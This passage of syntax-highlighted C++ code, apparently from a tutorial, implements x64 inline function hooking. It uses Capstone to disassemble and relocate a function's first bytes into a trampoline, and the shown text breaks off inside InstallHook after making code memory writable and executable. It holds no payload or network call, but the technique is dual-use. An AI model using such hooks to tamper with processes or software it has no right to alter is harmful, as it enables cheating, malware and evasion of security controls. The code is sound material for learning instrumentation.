<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">struct</span> <span class="nc">X64Instructions</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">instructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numInstructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numBytes</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">X64Instructions</span> <span class="nf">StealBytes</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">function</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// Disassemble stolen bytes</span>
<span class="n">csh</span> <span class="n">handle</span><span class="p">;</span>
<span class="n">cs_open</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">,</span> <span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="n">cs_option</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">CS_OPT_DETAIL</span><span class="p">,</span> <span class="n">CS_OPT_ON</span><span class="p">);</span> <span class="c1">// we need details enabled for relocating RIP relative instrs</span>
<span class="kt">size_t</span> <span class="n">count</span><span class="p">;</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">disassembledInstructions</span><span class="p">;</span> <span class="c1">//allocated by cs_disasm, needs to be manually freed later</span>
<span class="n">count</span> <span class="o">=</span> <span class="n">cs_disasm</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="o">&</span><span class="n">disassembledInstructions</span><span class="p">);</span>
<span class="c1">//get the instructions covered by the first 5 bytes of the original function</span>
<span class="kt">uint32_t</span> <span class="n">byteCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">stolenInstrCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">disassembledInstructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">byteCount</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">stolenInstrCount</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">byteCount</span> <span class="o">>=</span> <span class="mi">5</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//replace instructions in target func with NOPs</span>
<span class="n">memset</span><span class="p">(</span><span class="n">function</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">byteCount</span><span class="p">);</span>
<span class="n">cs_close</span><span class="p">(</span><span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="k">return</span> <span class="p">{</span> <span class="n">disassembledInstructions</span><span class="p">,</span> <span class="n">stolenInstrCount</span><span class="p">,</span> <span class="n">byteCount</span> <span class="p">};</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeJump</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isAnyJumpInstruction</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_JAE</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_JS</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">isJmp</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_JMP</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithEBorE9</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xEB</span> <span class="o">||</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE9</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isJmp</span> <span class="o">?</span> <span class="n">startsWithEBorE9</span> <span class="o">:</span> <span class="n">isAnyJumpInstruction</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeCall</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isCall</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithE8</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE8</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isCall</span> <span class="o">&&</span> <span class="n">startsWithE8</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">RewriteJumpInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand</span>
<span class="c1">//rewrite the operand for the jump to go to the jump table</span>
<span class="kt">uint8_t</span> <span class="n">instrByteSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0x0F</span> <span class="o">?</span> <span class="mi">2</span> <span class="o">:</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">operandSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">instrByteSize</span><span class="p">;</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">operandSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">]</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint16_t</span> <span class="n">dist16</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist16</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint32_t</span> <span class="n">dist32</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist32</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">RewriteCallInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//calls need to be rewritten as relative jumps to the abs table</span>
<span class="c1">//but we want to preserve the length of the instruction, so pad with NOPs</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="n">distToJumpTable</span> <span class="p">};</span>
<span class="n">memset</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddJmpToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">jmp</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">jmp</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">absTableMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">targetAddr</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//size of mov/jmp instrs for absolute jump</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddCallToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">call</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackToHookedFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">call</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dstMem</span> <span class="o">=</span> <span class="n">absTableMem</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">targetAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="n">dstMem</span> <span class="o">+=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="c1">//after the call, we need to add a second 2 byte jump, which will jump back to the</span>
<span class="c1">//final jump of the stolen bytes. This jump is written at dstMem, so its offset is relative to dstMem</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">jumpBackToHookedFunc</span> <span class="o">-</span> <span class="p">(</span><span class="n">dstMem</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">)))</span> <span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">);</span> <span class="c1">//15</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">.</span><span class="n">op_count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86_op</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">operands</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">//mem type is rip relative, like lea rcx,[rip+0xbeef]</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span><span class="o">-></span><span class="n">type</span> <span class="o">==</span> <span class="n">X86_OP_MEM</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//if we're relative to rip</span>
<span class="k">return</span> <span class="n">op</span><span class="o">-></span><span class="n">mem</span><span class="p">.</span><span class="n">base</span> <span class="o">==</span> <span class="n">X86_REG_RIP</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">template</span><span class="o"><</span><span class="k">class</span> <span class="nc">T</span><span class="p">></span>
<span class="n">T</span> <span class="nf">GetDisplacement</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">T</span> <span class="n">disp</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">T</span><span class="p">));</span>
<span class="k">return</span> <span class="n">disp</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//rewrite instruction bytes so that any RIP-relative displacement operands</span>
<span class="c1">//make sense with wherever we're relocating to</span>
<span class="kt">void</span> <span class="nf">RelocateInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstLocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="o">-></span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">displacement</span> <span class="o">=</span> <span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">];</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_size</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int8_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint8_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int8_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int16_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint16_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int16_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int32_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int32_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of a 64 bit mov/jmp instruction pair</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">RewriteJumpInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="n">RewriteCallInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">jumpBackMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">(</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">,</span> <span class="kt">void</span><span class="o">**</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span>
